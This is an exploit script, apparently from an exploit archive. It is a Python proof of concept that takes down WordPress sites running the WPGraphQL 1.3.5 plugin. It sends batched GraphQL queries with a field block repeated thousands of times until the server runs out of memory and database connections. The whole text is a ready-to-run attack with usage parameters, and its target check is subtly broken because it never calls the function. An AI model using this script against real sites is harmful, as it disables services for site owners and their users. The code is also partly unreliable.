# Exploit Title: WordPress Plugin WPGraphQL 1.3.5 - Denial of Service # Author: Dolev Farhi # Date: 2021-04-12 # Vendor Homepage: https://www.wpgraphql.com/ # Version: 1.3.5 # Tested on: Ubuntu """ This attack uses duplication of fields amplified by GraphQL batched queries, resulting in server OOM and MySQL connection errors. """ import sys import requests def usage(): print('* WordPress GraphQL 1.3.5 Denial of Service *') print('python {} <wordpress_url> <number_of_field_duplications> <number_of_chained_queries>'.format(sys.argv[0])) print('python {} http://site.com 10000 100'.format(sys.argv[0])) sys.exit(1) if len(sys.argv) < 4: print('Missing arguments!') usage() def wpgql_exists(): try: r = requests.post(WORDPRESS_URL, json='x') if 'GraphQL' in r.json()['errors'][0]['message']: return True except: pass return False # This PoC assumes graphql is located at index.php?graphql WORDPRESS_URL = sys.argv[1] + '/index.php?graphql' FORCE_MULTIPLIER = int(sys.argv[2]) CHAINED_REQUESTS = int(sys.argv[3]) if wpgql_exists is False: print('Could not identify GraphQL running at "/index.php?graphql"') sys.exit(1) queries = [] payload = 'content \n comments { \n nodes { \n content } }' * FORCE_MULTIPLIER query = {'query':'query { \n posts { \n nodes { \n ' + payload + '} } }'} for _ in range(0, CHAINED_REQUESTS): queries.append(query) r = requests.post(WORDPRESS_URL, json=queries) print('Time took: {} seconds '.format(r.elapsed.total_seconds())) print('Response:', r.json())